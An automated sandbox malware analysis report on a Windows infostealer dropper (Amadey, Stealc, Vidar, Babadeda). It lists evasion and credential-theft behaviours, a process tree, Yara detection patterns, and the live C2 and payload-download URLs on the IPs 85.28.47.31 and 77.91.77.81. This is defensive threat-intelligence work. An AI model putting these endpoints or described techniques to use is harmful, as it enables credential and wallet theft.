Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1479814
MD5:ead5c20b175ebddfc294f19d276d9f5a
SHA1:f74b6cecb5a68042dee54de356a2ab8ca9d7f622
SHA256:7e559097f4e87c8e7d7850bf969e86fa556f090455318c79abc23514201f99d4
Tags:exe
Infos:

Detection

Amadey, Babadeda, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
Yara detected Babadeda
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file contains section with special chars
PE file has a writeable .text section
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1588 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EAD5C20B175EBDDFC294F19D276D9F5A)
    • cmd.exe (PID: 1172 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGDHIIIIEHC.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • userGDHIIIIEHC.exe (PID: 4860 cmdline: "C:\Users\userGDHIIIIEHC.exe" MD5: A0CED1B039766FBE1B0C2DA4F5BBAA5E)
        • explorti.exe (PID: 8336 cmdline: "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" MD5: A0CED1B039766FBE1B0C2DA4F5BBAA5E)
    • cmd.exe (PID: 1756 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCFHCBKKFIJ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • userCFHCBKKFIJ.exe (PID: 2760 cmdline: "C:\Users\userCFHCBKKFIJ.exe" MD5: D72007A9646255AC092CF654388CFEB8)
        • cmd.exe (PID: 7080 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2656.tmp\2657.tmp\2658.bat C:\Users\userCFHCBKKFIJ.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chrome.exe (PID: 3804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
            • chrome.exe (PID: 6860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2016,i,17827590542136371952,471610067636896482,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
            • chrome.exe (PID: 7424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4684 --field-trial-handle=2016,i,17827590542136371952,471610067636896482,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
            • chrome.exe (PID: 7508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4208 --field-trial-handle=2016,i,17827590542136371952,471610067636896482,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • msedge.exe (PID: 6864 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account" MD5: BF154738460E4AB1D388970E1AB13FAB)
            • msedge.exe (PID: 7688 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=2184,i,4203635227704693361,2033266922296475971,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
          • firefox.exe (PID: 4328 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • cmd.exe (PID: 7644 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBGCBGCAFI.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RoamingCBGCBGCAFI.exe (PID: 7952 cmdline: "C:\Users\user\AppData\RoamingCBGCBGCAFI.exe" MD5: 927614BDB1FFF68B49468BC4A3886F36)
        • axplong.exe (PID: 8840 cmdline: "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe" MD5: 927614BDB1FFF68B49468BC4A3886F36)
    • WerFault.exe (PID: 9056 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 2384 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • firefox.exe (PID: 5588 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 7200 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 9160 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2264 -parentBuildID 20230927232528 -prefsHandle 2196 -prefMapHandle 2188 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0cf79a7-9fe5-4dbc-be74-a5022d30a8d8} 7200 "\\.\pipe\gecko-crash-server-pipe.7200" 1e94a56a710 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 9280 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4440 -parentBuildID 20230927232528 -prefsHandle 4424 -prefMapHandle 4420 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9504f799-890a-40e2-aa3f-a414be824c0e} 7200 "\\.\pipe\gecko-crash-server-pipe.7200" 1e95cb89510 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • msedge.exe (PID: 7944 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 2832 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 9984 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6788 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 10148 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6976 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 8456 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3536 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 9252 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3536 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • msedge.exe (PID: 8456 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=7808 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 2884 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=4844 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • axplong.exe (PID: 4900 cmdline: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe MD5: 927614BDB1FFF68B49468BC4A3886F36)
  • explorti.exe (PID: 504 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: A0CED1B039766FBE1B0C2DA4F5BBAA5E)
    • explorti.exe (PID: 9328 cmdline: "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" MD5: A0CED1B039766FBE1B0C2DA4F5BBAA5E)
    • 4ddf12fb51.exe (PID: 9252 cmdline: "C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe" MD5: EAD5C20B175EBDDFC294F19D276D9F5A)
      • WerFault.exe (PID: 9516 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 9252 -s 1304 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • 4ddf12fb51.exe (PID: 9912 cmdline: "C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe" MD5: EAD5C20B175EBDDFC294F19D276D9F5A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
BabadedaAccording to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus users.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}

Threatname: Vidar

{"C2 url": "http://85.28.47.31silence/5499d72b3a3e55be.php"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\userCFHCBKKFIJ.exeJoeSecurity_BabadedaYara detected BabadedaJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\go[1].exeJoeSecurity_BabadedaYara detected BabadedaJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\num[1].exeJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000032.00000002.3040304288.00000000009EC000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
          • 0x900:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
          0000002F.00000002.2938541456.00000000022C0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          0000002A.00000002.2666201612.0000000000AB1000.00000040.00000001.01000000.00000018.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            00000000.00000002.2525036759.0000000000812000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              0000002D.00000003.2736517396.0000000004EE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                Click to see the 23 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                9.2.userCFHCBKKFIJ.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                  9.0.userCFHCBKKFIJ.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                    50.2.4ddf12fb51.exe.7d0e67.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      43.2.axplong.exe.6a0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        6.2.userGDHIIIIEHC.exe.be0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          Click to see the 2 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: New RUN Key Pointing to Suspicious Folder
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe, ProcessId: 504, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4ddf12fb51.exe
                          Sigma detected: Suspicious File Creation In Uncommon AppData Folder
                          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 1588, TargetFilename: C:\Users\user\AppData\RoamingCBGCBGCAFI.exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe, ProcessId: 504, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4ddf12fb51.exe

                          Snort Signatures

                          No Snort rule has matched

                          Suricata Signatures

                          Timestamp:2024-07-24T07:19:38.000202+0200
                          SID:2856147
                          Source Port:50442
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:15:37.409703+0200
                          SID:2044243
                          Source Port:49891
                          Destination Port:80
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-24T07:18:08.661667+0200
                          SID:2856147
                          Source Port:50238
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:18:19.755505+0200
                          SID:2856147
                          Source Port:50261
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:14:26.234982+0200
                          SID:2019714
                          Source Port:49718
                          Destination Port:80
                          Protocol:TCP
                          Classtype:Potentially Bad Traffic
                          Timestamp:2024-07-24T07:20:17.398531+0200
                          SID:2856147
                          Source Port:50535
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:18:38.447188+0200
                          SID:2856147
                          Source Port:50298
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:20:57.367335+0200
                          SID:2856147
                          Source Port:50615
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:21:20.351299+0200
                          SID:2856147
                          Source Port:50669
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:22:31.548423+0200
                          SID:2856147
                          Source Port:62323
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:15:09.454365+0200
                          SID:2856122
                          Source Port:80
                          Destination Port:49819
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:15:10.170230+0200
                          SID:2044696
                          Source Port:49828
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:15:20.838324+0200
                          SID:2044243
                          Source Port:49847
                          Destination Port:80
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-24T07:15:30.869628+0200
                          SID:2044243
                          Source Port:49868
                          Destination Port:80
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-24T07:23:01.524203+0200
                          SID:2856147
                          Source Port:62395
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:14:10.315336+0200
                          SID:2044243
                          Source Port:49711
                          Destination Port:80
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-24T07:15:06.675856+0200
                          SID:2856147
                          Source Port:49819
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:13:58.347176+0200
                          SID:2856147
                          Source Port:62440
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:20:01.267101+0200
                          SID:2856147
                          Source Port:50496
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:18:49.091946+0200
                          SID:2856147
                          Source Port:50326
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:17:36.813097+0200
                          SID:2856147
                          Source Port:50158
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:18:52.003878+0200
                          SID:2856147
                          Source Port:50333
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:18:45.991728+0200
                          SID:2856147
                          Source Port:50318
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:18:25.919989+0200
                          SID:2856147
                          Source Port:50275
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:18:34.725735+0200
                          SID:2856147
                          Source Port:50286
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:14:12.138271+0200
                          SID:2044248
                          Source Port:49711
                          Destination Port:80
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-24T07:14:10.548452+0200
                          SID:2044244
                          Source Port:49711
                          Destination Port:80
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-24T07:18:07.105986+0200
                          SID:2856147
                          Source Port:50236
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:17:59.986693+0200
                          SID:2856147
                          Source Port:50222
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:18:52.187394+0200
                          SID:2856147
                          Source Port:50334
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:20:06.804230+0200
                          SID:2856147
                          Source Port:50511
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:15:07.767868+0200
                          SID:2019714
                          Source Port:49822
                          Destination Port:80
                          Protocol:TCP
                          Classtype:Potentially Bad Traffic
                          Timestamp:2024-07-24T07:14:10.775126+0200
                          SID:2044246
                          Source Port:49711
                          Destination Port:80
                          Protocol:TCP
                          Classtype:Malware Command and Control Activity Detected
                          Timestamp:2024-07-24T07:15:12.965702+0200
                          SID:2044696
                          Source Port:49838
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:16:07.959306+0200
                          SID:2856147
                          Source Port:49951
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:23:04.667306+0200
                          SID:2856147
                          Source Port:62403
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:17:10.232766+0200
                          SID:2856147
                          Source Port:50098
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:18:03.460371+0200
                          SID:2856147
                          Source Port:50230
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:2024-07-24T07:22:23.897994+0200
                          SID:2856147
                          Source Port:62295
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for URL or domain
                          Source: http://77.91.77.82/Hun4Ko/index.phpURL Reputation: Label: phishing
                          Source: http://77.91.77.81/soka/random.exeAvira URL Cloud: Label: phishing
                          Source: http://77.91.77.81/mine/amadka.exeURL Reputation: Label: phishing
                          Source: http://77.91.77.81/cost/go.exeURL Reputation: Label: malware
                          Source: http://85.28.47.31/8405906461a5200c/msvcp140.dllAvira URL Cloud: Label: malware
                          Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dllAvira URL Cloud: Label: malware
                          Source: http://85.28.47.31/5499d72b3a3e55be.phplegramAvira URL Cloud: Label: malware
                          Source: http://85.28.47.31/5499d72b3a3e55be.php4Avira URL Cloud: Label: malware
                          Source: http://85.28.47.31/5499d72b3a3e55be.php/Avira URL Cloud: Label: malware
                          Source: http://77.91.77.81/soka/random.exeFPAvira URL Cloud: Label: phishing
                          Source: http://77.91.77.81/Kiru9gu/index.phpAvira URL Cloud: Label: phishing
                          Source: http://85.28.47.31Avira URL Cloud: Label: malware
                          Source: http://85.28.47.31/5499d72b3a3e55be.php.exeAvira URL Cloud: Label: malware
                          Source: http://85.28.47.31/5499d72b3a3e55be.php$Avira URL Cloud: Label: malware
                          Source: http://77.91.77.81/cost/go.exe00Start4http://77.91.77.81/soka/random.exe00Start2CURRENTRENTs---JKEBFAvira URL Cloud: Label: phishing
                          Source: http://85.28.47.31/8405906461a5200c/sqlite3.dlljAvira URL Cloud: Label: malware
                          Source: http://85.28.47.31/5499d72b3a3e55be.phpvAvira URL Cloud: Label: malware
                          Source: http://85.28.47.31/8405906461a5200c/softokn3.dllAvira URL Cloud: Label: malware
                          Source: http://85.28.47.31/5499d72b3a3e55be.phpxAvira URL Cloud: Label: malware
                          Source: http://85.28.47.31/8405906461a5200c/nss3.dllAvira URL Cloud: Label: malware
                          Source: http://85.28.47.31/5499d72b3a3e55be.phphAvira URL Cloud: Label: malware
                          Source: http://85.28.47.31/5499d72b3a3e55be.phpcAvira URL Cloud: Label: malware
                          Source: http://85.28.47.31/8405906461a5200c/mozglue.dllAvira URL Cloud: Label: malware
                          Source: http://85.28.47.31/sAvira URL Cloud: Label: malware
                          Source: http://85.28.47.31/nAvira URL Cloud: Label: malware
                          Source: http://85.28.47.31/8405906461a5200c/freebl3.dllAvira URL Cloud: Label: malware
                          Source: http://77.91.77.81/cost/go.exeJcAvira URL Cloud: Label: phishing
                          Source: http://85.28.47.31/Avira URL Cloud: Label: malware
                          Source: http://77.91.77.81/mine/amadka.exexAvira URL Cloud: Label: phishing
                          Source: http://77.91.77.81/soka/random.exe:RAvira URL Cloud: Label: phishing
                          Source: http://85.28.47.31/CAvira URL Cloud: Label: malware
                          Antivirus detection for dropped file
                          Source: C:\Users\userGDHIIIIEHC.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Found malware configuration
                          Source: 0000002F.00000002.2934283237.0000000000752000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}
                          Source: 50.2.4ddf12fb51.exe.7d0e67.1.raw.unpackMalware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.31silence/5499d72b3a3e55be.php"}
                          Multi AV Scanner detection for domain / URL
                          Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dllVirustotal: Detection: 17%Perma Link
                          Source: http://77.91.77.81/soka/random.exeVirustotal: Detection: 25%Perma Link
                          Source: http://85.28.47.31/8405906461a5200c/msvcp140.dllVirustotal: Detection: 17%Perma Link
